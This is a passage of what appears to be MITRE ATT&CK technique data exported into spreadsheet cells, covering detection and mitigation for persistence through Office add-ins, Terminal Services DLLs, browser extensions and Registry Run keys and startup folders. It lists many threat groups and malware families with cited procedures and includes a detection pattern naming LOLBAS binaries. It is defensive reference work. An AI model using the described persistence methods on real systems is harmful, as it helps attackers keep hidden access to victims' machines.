Audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Windows Registry Key Modification
Audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent Office applications from creating child processes and from writing potentially malicious executable content to disk. (Citation: win10_asr)
Naikon
[Naikon](https://attack.mitre.org/groups/G0019) has used the RoyalRoad exploit builder to drop a second stage loader, intel.wll, into the Word Startup folder on the compromised host.(Citation: CheckPoint Naikon May 2020)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has been loaded through a `.wll` extension added to the ` %APPDATA%\microsoft\word\startup\` repository.(Citation: Talos Bisonal Mar 2020) 
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for potential adversary actions to modify Registry values (ex: &lt;code&gt;reg.exe&lt;/code&gt;) or modify/replace the legitimate &lt;code&gt;termsrv.dll&lt;/code&gt;.
File Modification
Monitor unexpected changes and/or interactions with &lt;code&gt;termsrv.dll&lt;/code&gt;, which is typically stored in &lt;code&gt;%SystemRoot%\System32\&lt;/code&gt;.
Module Load
Monitor module loads by the Terminal Services process (ex: &lt;code&gt;svchost.exe -k termsvcs&lt;/code&gt;) for unexpected DLLs (the default is &lt;code&gt;%SystemRoot%\System32\termsrv.dll&lt;/code&gt;, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) to potentially conceal a malicious payload).
Process Creation
Monitor processes with arguments that may potentially highlight adversary actions to modify Registry values (ex: &lt;code&gt;reg.exe&lt;/code&gt;) or modify/replace the legitimate &lt;code&gt;termsrv.dll&lt;/code&gt;.
Windows Registry Key Modification
Monitor for changes to Registry keys associated with &lt;code&gt;ServiceDll&lt;/code&gt; and other subkey values under &lt;code&gt;HKLM\System\CurrentControlSet\services\TermService\Parameters\&lt;/code&gt;.
Audit
Regularly check component software on critical services that adversaries may target for persistence to verify the integrity of the systems and identify if unexpected changes have been made.
Restrict Registry Permissions
Consider using Group Policy to configure and block modifications to Terminal Services parameters in the Registry.(Citation: Microsoft System Services Fundamentals)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor and inspect commands and arguments associated with manipulating the power settings of a system.
File Modification
Monitor for unexpected changes to configuration files associated with the power settings of a system.
Audit
Periodically inspect systems for abnormal and unexpected power settings that may indicate malicious activty.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for usage of the profiles tool, such as profiles install -type=configuration.
File Creation
Monitor for newly constructed files and/or all installed extensions maintain a plist file in the /Library/Managed Preferences/username/ directory. Ensure all listed files are in alignment with approved extensions
Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts.
Process Creation
Monitor for newly executed processes that could be used to abuse internet browser extensions to establish persistence. 
Windows Registry Key Creation
Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.
Audit
 Ensure extensions that are installed are the intended ones as many malicious extensions will masquerade as legitimate ones.
Execution Prevention
Set a browser extension allow or deny list as appropriate for your security policy. (Citation: Technospot Chrome Extensions GP)
Limit Software Installation
Only install browser extensions from trusted sources that can be verified. Browser extensions for some browsers can be controlled through Group Policy. Change settings to prevent the browser from installing extensions without sufficient permissions.
Update Software
Ensure operating systems and browsers are using the most current version. 
User Training
Close out all browser sessions when finished using them to prevent any potentially malicious extensions from continuing to run.
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used Google Chrome browser extensions to infect victims and to steal passwords and cookies.(Citation: Zdnet Kimsuky Dec 2018)(Citation: Netscout Stolen Pencil Dec 2018)
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) can install malicious browser extensions that are used to hijack user searches.(Citation: MacKeeper Bundlore Apr 2019)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can use malicious browser extensions to steal cookies and other user information.(Citation: IBM Grandoreiro April 2020)
OSX/Shlayer
[OSX/Shlayer](https://attack.mitre.org/software/S0402) can install malicious Safari browser extensions to serve ads.(Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may abuse Microsoft transport agents to establish persistent access to systems. Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components.
File Creation
Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.
Audit
Regularly check component software on critical services that adversaries may target for persistence to verify the integrity of the systems and identify if unexpected changes have been made. 
Code Signing
Ensure all application component binaries are signed by the correct application developers. 
Privileged Account Management
Do not allow administrator accounts that have permissions to add component software on these services to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems. 
LightNeuron
[LightNeuron](https://attack.mitre.org/software/S0395) has used a malicious Microsoft Exchange transport agent for persistence.(Citation: ESET LightNeuron May 2019)
</t>
  </si>
  <si>
    <t>Command Execution
Monitor executed commands and arguments that may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.
File Modification
Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including the startup folders. (Citation: TechNet Autoruns)
Process Creation
Monitor for newly executed processes executed from the Run/RunOnce registry keys through Windows EID 9707 or “Software\Microsoft\Windows\CurrentVersion\Run” and “Software\Microsoft\Windows\CurrentVersion\RunOnce” registry keys with the full command line.
Registry modifications are often essential in establishing persistence via known Windows mechanisms. Many legitimate modifications are done graphically via regedit.exe or by using the corresponding channels, or even calling the Registry APIs directly. The built-in utility reg.exe provides a command-line interface to the registry, so that queries and modifications can be performed from a shell, such as cmd.exe. When a user is responsible for these actions, the parent of cmd.exe will likely be explorer.exe. Occasionally, power users and administrators write scripts that do this behavior as well, but likely from a different process tree. These background scripts must be learned so they can be tuned out accordingly.
Output Description
The sequence of processes that resulted in reg.exe being started from a shell. That is, a hierarchy that looks like
• great-grand_parent.exe
• grand_parent.exe
• parent.exe
• reg.exe
&lt;h4&gt;Analytic 1 - Reg.exe called from Command Shell &lt;/h4&gt;
&lt;code&gt;reg = filter processes where (exe == "reg.exe" and parent_exe == "cmd.exe")
cmd = filter processes where (exe == "cmd.exe" and parent_exe != "explorer.exe"")
reg_and_cmd = join (reg, cmd) where (reg.ppid == cmd.pid and reg.hostname == cmd.hostname)&lt;/code&gt;
&lt;h4&gt;Analytic 2 - Rare LolBAS Command Lines&lt;/h4&gt;
&lt;code&gt;lolbas_processes = filter processes where (exe = "At.exe" OR exe = "Atbroker.exe" OR exe = "Bash.exe" OR exe = "Bitsadmin.exe" OR exe = "Certutil.exe" OR exe = "Cmd.exe" OR exe = "Cmdkey.exe" OR exe = "Cmstp.exe" OR exe = "Control.exe" OR exe = "Csc.exe" OR exe = "Cscript.exe" OR exe = "Dfsvc.exe" OR exe = "Diskshadow.exe" OR exe = "Dnscmd.exe" OR exe = "Esentutl.exe" OR exe = "Eventvwr.exe" OR exe = "Expand.exe" OR exe = "Extexport.exe" OR exe = "Extrac32.exe" OR exe = "Findstr.exe" OR exe = "Forfiles.exe" OR exe = "Ftp.exe" OR exe = "Gpscript.exe" OR exe = "Hh.exe" OR exe = "Ie4uinit.exe" OR exe = "Ieexec.exe" OR exe = "Infdefaultinstall.exe" OR exe = "Installutil.exe" OR exe = "Jsc.exe" OR exe = "Makecab.exe" OR exe = "Mavinject.exe" OR exe = "Microsoft.Workflow.r.exe" OR exe = "Mmc.exe" OR exe = "Msbuild.exe" OR exe = "Msconfig.exe" OR exe = "Msdt.exe" OR exe = "Mshta.exe" OR exe = "Msiexec.exe" OR exe = "Odbcconf.exe" OR exe = "Pcalua.exe" OR exe = "Pcwrun.exe" OR exe = "Presentationhost.exe" OR exe = "Print.exe" OR exe = "Reg.exe" OR exe = "Regasm.exe" OR exe = "Regedit.exe" OR exe = "Register-cimprovider.exe" OR exe = "Regsvcs.exe" OR exe = "Regsvr32.exe" OR exe = "Replace.exe" OR exe = "Rpcping.exe" OR exe = "Rundll32.exe" OR exe = "Runonce.exe" OR exe = "Runscripthelper.exe" OR exe = "Sc.exe" OR exe = "Schtasks.exe" OR exe = "Scriptrunner.exe" OR exe = "SyncAppvPublishingServer.exe" OR exe = "Tttracer.exe" OR exe = "Verclsid.exe" OR exe = "Wab.exe" OR exe = "Wmic.exe" OR exe = "Wscript.exe" OR exe = "Wsreset.exe" OR exe = "Xwizard.exe" OR exe = "Advpack.dll OR exe = "Comsvcs.dll OR exe = "Ieadvpack.dll OR exe = "Ieaframe.dll OR exe = "Mshtml.dll OR exe = "Pcwutl.dll OR exe = "Setupapi.dll OR exe = "Shdocvw.dll OR exe = "Shell32.dll OR exe = "Syssetup.dll OR exe = "Url.dll OR exe = "Zipfldr.dll OR exe = "Appvlp.exe" OR exe = "Bginfo.exe" OR exe = "Cdb.exe" OR exe = "csi.exe" OR exe = "Devtoolslauncher.exe" OR exe = "dnx.exe" OR exe = "Dxcap.exe" OR exe = "Excel.exe" OR exe = "Mftrace.exe" OR exe = "Msdeploy.exe" OR exe = "msxsl.exe" OR exe = "Powerpnt.exe" OR exe = "rcsi.exe" OR exe = "Sqler.exe" OR exe = "Sqlps.exe" OR exe = "SQLToolsPS.exe" OR exe = "Squirrel.exe" OR exe = "te.exe" OR exe = "Tracker.exe" OR exe = "Update.exe" OR exe = "vsjitdebugger.exe" OR exe = "Winword.exe" OR exe = "Wsl.exe" OR exe = "CL_Mutexverifiers.ps1 OR exe = "CL_Invocation.ps1 OR exe = "Manage-bde.wsf OR exe = "Pubprn.vbs OR exe = "Slmgr.vbs OR exe = "Syncappvpublishingserver.vbs OR exe = "winrm.vbs OR exe = "Pester.bat)
process_count = count(lolbas_processes) by process
process_count_avg = average(process_count)
process_count_stdev = standard_deviation(process_count)
lower_bound = process_count_avg - stdev * 1.5
outliers = filter lolbas_processes where (process_count &lt; lower_bound)&lt;/code&gt;
Windows Registry Key Creation
Monitor for newly created windows registry keys that may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.
Windows Registry Key Modification
Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations. (Citation: TechNet Autoruns)
Detection of the modification of the registry key &lt;code&gt;Common Startup&lt;/code&gt; located in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\ and HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\. When a user logs on, any files located in the Startup Folder are launched. Attackers may modify these folders with other files in order to evade detection set on these default folders. This detection focuses on EventIDs 4688 and 1 for process creation and EventID 4657 for the modification of the Registry Keys.
&lt;h4&gt;Analytic 1 - Modification of Default Startup Folder in the Registry Key ‘Common Startup’&lt;/h4&gt;
&lt;code&gt;logon_reg_processes = filter processes where (command_line CONTAINS("*reg*") AND command_line CONTAINS("*add*") AND command_line CONTAINS("*/d*") OR (command_line CONTAINS("*Set-ItemProperty*") AND command_line CONTAINS("*-value*")) AND command_line CONTAINS("*Common Startup*"))
reg_keys = search Registry:value_edit
logon_reg_keys = filter reg_keys where value="Common Startup"&lt;/code&gt;
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) placed LNK files into the victims' startup folder for persistence.(Citation: McAfee Lazarus Jul 2020) 
Operation Sharpshooter
During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), a first-stage downloader installed [Rising Sun](https://attack.mitre.org/software/S0448) to `%Startup%\mssync.exe` on a compromised host.(Citation: McAfee Sharpshooter December 2018) 
APT18
[APT18](https://attack.mitre.org/groups/G0026) establishes persistence via the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; key.(Citation: Anomali Evasive Maneuvers July 2015)(Citation: PaloAlto DNS Requests May 2016)
APT19
An [APT19](https://attack.mitre.org/groups/G0073) HTTP malware variant establishes persistence by setting the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Debug Tools-%LOCALAPPDATA%\&lt;/code&gt;.(Citation: Unit 42 C0d0so0 Jan 2016)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has deployed malware that has copied itself to the startup directory for persistence.(Citation: TrendMicro Pawn Storm Dec 2020)
APT29
[APT29](https://attack.mitre.org/groups/G0016) added Registry Run keys to establish persistence.(Citation: Mandiant No Easy Breach)
APT3
[APT3](https://attack.mitre.org/groups/G0022) places scripts in the startup folder for persistence.(Citation: FireEye Operation Double Tap)
APT32
[APT32](https://attack.mitre.org/groups/G0050) established persistence using Registry Run keys, both to execute PowerShell and VBS scripts as well as to execute their backdoor directly.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has deployed a tool known as [DarkComet](https://attack.mitre.org/software/S0334) to the Startup folder of a victim, and used Registry run keys to gain persistence.(Citation: Symantec Elfin Mar 2019)(Citation: Microsoft Holmium June 2020)
APT37
[APT37](https://attack.mitre.org/groups/G0067)'s has added persistence via the Registry key &lt;code&gt;HKCU\Software\Microsoft\CurrentVersion\Run\&lt;/code&gt;.(Citation: FireEye APT37 Feb 2018)(Citation: Talos Group123)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has maintained persistence using the startup folder.(Citation: FireEye APT39 Jan 2019)
APT41
[APT41](https://attack.mitre.org/groups/G0096) created and modified startup files for persistence.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) [APT41](https://attack.mitre.org/groups/G0096) added a registry key in &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost&lt;/code&gt; to establish persistence for Cobalt Strike.(Citation: FireEye APT41 March 2020)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used a batch script that adds a Registry Run key to establish malware persistence.(Citation: Secureworks BRONZE BUTLER Oct 2017)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has used Registry Run keys for persistence. The group has also set a Startup path to launch the PowerShell shell command and download Cobalt Strike.(Citation: Group IB Cobalt Aug 2017)
Confucius
[Confucius](https://attack.mitre.org/groups/G0142) has dropped malicious files into the startup folder `%AppData%\Microsoft\Windows\Start Menu\Programs\Startup` on a compromised host in order to maintain persistence.(Citation: Uptycs Confucius APT Jan 2021)
Dark Caracal
[Dark Caracal](https://attack.mitre.org/groups/G0070)'s version of [Bandook](https://attack.mitre.org/software/S0234) adds a registry key to &lt;code&gt;HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; for persistence.(Citation: Lookout Dark Caracal Jan 2018)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) has been known to establish persistence by adding programs to the Run Registry key.(Citation: Kaspersky Darkhotel)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has added the registry value ntdll to the Registry Run key to establish persistence.(Citation: US-CERT TA18-074A)
FIN10
[FIN10](https://attack.mitre.org/groups/G0051) has established persistence by using the Registry option in PowerShell Empire to add a Run key.(Citation: FireEye FIN10 June 2017)(Citation: Github PowerShell Empire)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has used Windows Registry run keys such as, `HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\hosts` to maintain persistence.(Citation: Mandiant FIN13 Aug 2022)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and SHIPBREAD.(Citation: FireEye FIN6 April 2016)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) malware has created Registry Run and RunOnce keys to establish persistence, and has also added items to the Startup folder.(Citation: FireEye FIN7 April 2017)(Citation: FireEye FIN7 Aug 2018)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools have registered Run keys in the registry to give malicious VBS files persistence.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: CERT-EE Gamaredon January 2021)
Gorgon Group
[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can create a .lnk file and add a Registry Run key to establish persistence.(Citation: Unit 42 Gorgon Group Aug 2018)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) added a spoofed binary to the start-up folder for persistence.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)
Inception
[Inception](https://attack.mitre.org/groups/G0100) has maintained persistence by modifying Registry run key value 
 &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt;.(Citation: Kaspersky Cloud Atlas December 2014)
Ke3chang
Several [Ke3chang](https://attack.mitre.org/groups/G0004) backdoors achieved persistence by adding a Run key.(Citation: NCC Group APT15 Alive and Strong)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has placed scripts in the startup folder for persistence and modified the `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce` Registry key.(Citation: Securelist Kimsuky Sept 2013)(Citation: CISA AA20-301A Kimsuky)(Citation: Crowdstrike GTR2020 Mar 2020)(Citation: Talos Kimsuky Nov 2021)(Citation: KISA Operation Muzabi)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has maintained persistence by loading malicious code into a startup folder or by adding a Registry Run key.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster RATs)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: Lazarus APT January 2022)
LazyScripter
[LazyScripter](https://attack.mitre.org/groups/G0140) has achieved persistence via writing a PowerShell script to the autorun registry key.(Citation: MalwareBytes LazyScripter Feb 2021)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has used malicious DLLs that setup persistence in the Registry Key `HKCU\Software\Microsoft\Windows\Current Version\Run`.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) malware has used Registry Run keys to establish persistence.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Phosphorus November 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021)
Molerats
[Molerats](https://attack.mitre.org/groups/G0021) saved malicious files within the AppData and Startup folders to maintain persistence.(Citation: Kaspersky MoleRATs April 2019)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has added Registry Run key &lt;code&gt;KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding&lt;/code&gt; to establish persistence.(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: Trend Micro Muddy Water March 2021)(Citation: Talos MuddyWater Jan 2022)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has created the registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\AdobelmdyU&lt;/code&gt; to maintain persistence.(Citation: Proofpoint TA416 November 2020)
Naikon
[Naikon](https://attack.mitre.org/groups/G0019) has modified a victim's Windows Run registry to establish persistence.(Citation: Bitdefender Naikon April 2021)
PROMETHIUM
[PROMETHIUM](https://attack.mitre.org/groups/G0056) has used Registry run keys to establish persistence.(Citation: Talos Promethium June 2020)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) has added the path of its second-stage malware to the startup folder to achieve persistence. One of its file stealers has also persisted by adding a Registry Run key.(Citation: Cymmetria Patchwork)(Citation: TrendMicro Patchwork Dec 2017)
Putter Panda
A dropper used by [Putter Panda](https://attack.mitre.org/groups/G0024) installs itself into the ASEP Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; with a value named McUpdate.(Citation: CrowdStrike Putter Panda)
RTM
[RTM](https://attack.mitre.org/groups/G0048) has used Registry run keys to establish persistence for the [RTM](https://attack.mitre.org/software/S0148) Trojan and other tools, such as a modified version of TeamViewer remote desktop software.(Citation: ESET RTM Feb 2017)(Citation: Group IB RTM August 2019)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106)'s miner has created UPX-packed files in the Windows Start Menu Folder.(Citation: Talos Rocke August 2018)	
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has added paths to executables in the Registry to establish persistence.(Citation: Rewterz Sidewinder APT April 2020)(Citation: Rewterz Sidewinder COVID-19 June 2020)(Citation: Cyble Sidewinder September 2020)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has used &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;, &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;, and the Startup folder to establish persistence.(Citation: Group IB Silence Sept 2018)	
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has placed VBS files in the Startup folder and used Registry run keys to establish persistence for malicious payloads.(Citation: Proofpoint TA2541 February 2022)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has added batch scripts to the startup folder.(Citation: ATT TeamTNT Chimaera September 2020)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027)'s malware can add a Registry key to `Software\Microsoft\Windows\CurrentVersion\Run` for persistence.(Citation: Nccgroup Emissary Panda May 2018)(Citation: Lunghi Iron Tiger Linux)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has created shortcuts in the Startup folder to establish persistence.(Citation: Anomali Pirate Panda April 2020)(Citation: TrendMicro Tropic Trooper May 2020)
Turla
A [Turla](https://attack.mitre.org/groups/G0010) Javascript backdoor added a local_update_check value under the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; to establish persistence. Additionally, a [Turla](https://attack.mitre.org/groups/G0010) custom executable containing Metasploit shellcode is saved to the Startup folder to gain persistence.(Citation: ESET Turla Mosquito Jan 2018)(Citation: ESET Turla Mosquito May 2018)
Windshift
[Windshift](https://attack.mitre.org/groups/G0112) has created LNK files in the Startup folder to establish persistence.(Citation: BlackBerry Bahamut)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has established persistence via the Registry key &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; and a shortcut within the startup folder.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has created a Registry Run key named &lt;code&gt;Dropbox Update Setup&lt;/code&gt; to establish persistence for a malicious Python binary.(Citation: Zscaler APT31 Covid-19 October 2020)
ADVSTORESHELL
[ADVSTORESHELL](https://attack.mitre.org/software/S0045) achieves persistence by adding itself to the &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key.(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)
ANDROMEDA
[ANDROMEDA](https://attack.mitre.org/software/S1074) can establish persistence by dropping a sample of itself to `C:\ProgramData\Local Settings\Temp\mskmde.com` and adding a Registry run key to execute every time a user logs on.(Citation: Mandiant Suspected Turla Campaign February 2023)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) can add itself to the Registry as a startup program to establish persistence.(Citation: Fortinet Agent Tesla April 2018)(Citation: SentinelLabs Agent Tesla Aug 2020) 
Amadey
[Amadey](https://attack.mitre.org/software/S1025) has changed the Startup folder to the one containing its executable by overwriting the registry keys.(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to create the Registry key name &lt;code&gt;EstsoftAutoUpdate&lt;/code&gt; at &lt;code&gt;HKCU\Software\Microsoft/Windows\CurrentVersion\RunOnce&lt;/code&gt; to establish persistence.(Citation: Malwarebytes Kimsuky June 2021)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has established persistence via the Startup folder or Run Registry key.(Citation: CheckPoint Naikon May 2020)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) creates a startup item for persistence. (Citation: Cofense Astaroth Sept 2018)
AuTo Stealer
[AuTo Stealer](https://attack.mitre.org/software/S1029) can place malicious executables in a victim's AutoRun registry key or StartUp directory, depending on the AV product installed, to maintain persistence.(Citation: MalwareBytes SideCopy Dec 2021)
Avaddon
[Avaddon](https://attack.mitre.org/software/S0640) uses registry run keys for persistence.(Citation: Arxiv Avaddon Feb 2021)
AvosLocker
[AvosLocker](https://attack.mitre.org/software/S1053) has been executed via the `RunOnce` Registry key to run itself on safe mode.(Citation: Trend Micro AvosLocker Apr 2022)
BACKSPACE
[BACKSPACE](https://attack.mitre.org/software/S0031) achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory.(Citation: FireEye APT30)
BADNEWS
[BADNEWS](https://attack.mitre.org/software/S0128) installs a registry Run key to establish persistence.(Citation: Forcepoint Monsoon)
BBSRAT
[BBSRAT](https://attack.mitre.org/software/S0127) has been loaded through DLL side-loading of a legitimate Citrix executable that is set to persist through the Registry Run key location &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ssonsvr.exe&lt;/code&gt;.
BabyShark
[BabyShark](https://attack.mitre.org/software/S0414) has added a Registry key to ensure all future macros are enabled for Microsoft Word and Excel as well as for additional persistence.(Citation: Unit42 BabyShark Feb 2019)(Citation: CISA AA20-301A Kimsuky)
Backdoor.Oldrea
[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) adds Registry Run keys to achieve persistence.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)
BadPatch
[BadPatch](https://attack.mitre.org/software/S0337) establishes a foothold by adding a link to the malware executable in the startup folder.(Citation: Unit 42 BadPatch Oct 2017)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can create or add files to Registry Run Keys to establish persistence.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has added itself to the Registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Run\&lt;/code&gt; for persistence.(Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020) 
BitPaymer
[BitPaymer](https://attack.mitre.org/software/S0570) has set the run key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; for persistence.(Citation: Crowdstrike Indrik November 2018)
BlackEnergy
The [BlackEnergy](https://attack.mitre.org/software/S0089) 3 variant drops its main DLL component and then creates a .lnk shortcut to that file in the startup folder.(Citation: F-Secure BlackEnergy 2014)
BoomBox
[BoomBox](https://attack.mitre.org/software/S0635) can establish persistence by writing the Registry value &lt;code&gt;MicroNativeCacheSvc&lt;/code&gt; to &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;.(Citation: MSTIC Nobelium Toolset May 2021)
Briba
[Briba](https://attack.mitre.org/software/S0204) creates run key Registry entries pointing to malicious DLLs dropped to disk.(Citation: Symantec Briba May 2012)
CORESHELL
[CORESHELL](https://attack.mitre.org/software/S0137) has established persistence by creating autostart extensibility point (ASEP) Registry entries in the Run key and other Registry keys, as well as by creating shortcuts in the Internet Explorer Quick Start folder.(Citation: Microsoft SIR Vol 19)
Carbanak
[Carbanak](https://attack.mitre.org/software/S0030) stores a configuration files in the startup directory to automatically execute commands in order to persist across reboots.(Citation: FireEye CARBANAK June 2017)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) has maintained persistence by placing itself inside the current user's startup folder.(Citation: Prevx Carberp March 2011)
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) establishes Persistence by setting the  &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load&lt;/code&gt; Registry key to point to its executable.(Citation: PaloAlto CardinalRat Apr 2017)
ChChes
[ChChes](https://attack.mitre.org/software/S0144) establishes persistence by adding a Registry Run key.(Citation: PWC Cloud Hopper Technical Annex April 2017)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) has added persistence via the Registry key &lt;code&gt;software\microsoft\windows\currentversion\run\microsoft windows html help&lt;/code&gt;.(Citation: Cybereason Chaes Nov 2020)
Chinoxy
[Chinoxy](https://attack.mitre.org/software/S1041) has established persistence via the `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` registry key and by loading a dropper to `(%COMMON_ STARTUP%\\eoffice.exe)`.(Citation: Bitdefender FunnyDream Campaign November 2020)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) can establish persistence by adding a Registry run key.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)
Cobian RAT
[Cobian RAT](https://attack.mitre.org/software/S0338) creates an autostart Registry key to ensure persistence.(Citation: Zscaler Cobian Aug 2017)
Comnie
[Comnie](https://attack.mitre.org/software/S0244) achieves persistence by adding a shortcut of itself to the startup path in the Registry.(Citation: Palo Alto Comnie)
Conficker
[Conficker](https://attack.mitre.org/software/S0608) adds Registry Run keys to establish persistence.(Citation: Trend Micro Conficker)
CozyCar
